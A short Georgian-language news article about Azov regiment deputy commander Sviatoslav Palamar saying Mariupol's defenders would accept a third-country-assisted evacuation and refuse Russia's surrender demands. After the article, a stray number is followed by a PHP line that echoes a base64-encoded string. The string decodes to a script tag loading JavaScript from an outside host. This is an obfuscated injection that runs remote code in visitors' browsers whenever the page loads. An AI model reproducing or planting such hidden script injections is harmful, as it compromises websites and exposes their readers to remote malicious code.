celsiusi
ავერსი საქკაბელი
„აზოვის პოლკის“ მეთაურის მოადგილემ, სვიატოსლავ პალამარმა განაცხადა, რომ მარიუპოლის მცველები მესამე ქვეყნის მხარდაჭერით ქალაქიდან ევაკუაციაზე თანახმა არიან. ამის სესახებ  ინფორმაციას „უკრაინსკაია პრავდა“ ავრცელებს.
 
მისივე თქმით, რუსეთთან მოლაპარაკებების პროცესში ჩართული უკრაინის ჯგუფის წარმომადგენლები მზად არიან ჩავიდნენ მარიუპოლში, რათა ევაკუაციის პროცესთან დაკავშირებით შეხვდნენ რუსულ მხარეს.
 
„დღეს ჩვენ ვესაუბრეთ უმაღლეს პოლიტიკურ ხელმძღვანელობას - ესენი არიან დავით არახამია და მიხაილო პოდოლიაკი, რომლებიც აცხადებენ, რომ მზად არიან ჩამოვიდნენ მარიუპოლში მოსალაპარაკებლად აქ დარჩენილი სამხედრო ნაწილების ევაკუაციის შესახებ.
 
ჩვენ მზად ვართ, რომ მესამე ქვეყნის დახმარებით ქალაქ მარიუპოლიდან ჩვენი ცეცხლსასროლი იარაღით ევაკუაცია მოვახდინოთ, რათა ჩვენი სამხედრო შემადგენლობა გადავარჩინოთ, გამოვიყვანოთ დაჭრილები და გადავიტანოთ დაღუპულთა ცხედრები, რათა პატივით დავკრძალოთ იმ ტერიტორიაზე, რომელსაც რუსეთის ფედერაცია არ აკონტროლებს. მოვუწოდებთ მთელ ცივილიზებულ სამყაროს, რომ უსაფრთხოების გარანტიებს შეუერთდეს. ხაზს ვუსვამ, რომ ჩვენ იარაღის ჩაბარებისა და ჩვენი დამცველების ჩაბარების შესახებ რუსეთის მიერ წამოყენებულ მოთხოვნებს მხარს არ ვუჭერთ“, - განაცხადა პალამარმა.
852
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");